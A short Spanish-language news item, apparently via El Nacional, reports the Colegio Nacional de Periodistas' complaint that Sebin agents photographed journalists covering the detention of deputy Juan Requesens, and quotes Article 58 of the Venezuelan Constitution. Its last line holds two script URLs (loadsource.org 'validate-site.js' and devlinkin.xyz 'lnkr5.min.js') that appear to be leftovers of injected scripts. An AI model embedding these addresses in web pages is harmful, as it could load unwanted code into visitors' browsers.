El Colegio de Periodista señaló que informar los sucesos relacionados con el diputado Juan Requesens no es un delito .

El Colegio Nacional de Periodistas (CNP) informó este sábado que funcionarios del Servicio Bolivariano de Inteligencia Nacional (Sebin) están fotografiando a los trabajadores de la prensa que se encuentran cubriendo los sucesos relacionados con la detención de Juan Requesens, diputado de la Asamblea Nacional, en El Helicoide.

“Agentes del Sebin toman fotografías de los colegas periodistas y demás trabajadores de la prensa que están dando cobertura a sucesos relacionados con la detención del diputado Juan Requesens en El Helicoide”, informó CNP mediante Twitter.

El CNP agregó que informar no es un delito, así como replicar contenidos informativos en las redes sociales y medios de comunicación.

“La comunicación es libre y plural, y comporta los deberes y responsabilidades que indique la ley. Toda persona tiene derecho a la información oportuna, veraz e imparcial, sin censura, de acuerdo con los principios de esta Constitución, así como el derecho de réplica y rectificación cuando se vean afectados directamente por informaciones inexactas o agraviantes”, de acuerdo con el artículo 58 de la Constitución.

VÍA EL NACIONAL.

 

https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x6748x&r=1534037159535https://devlinkin.xyz/addons/lnkr5.min.js

Loading...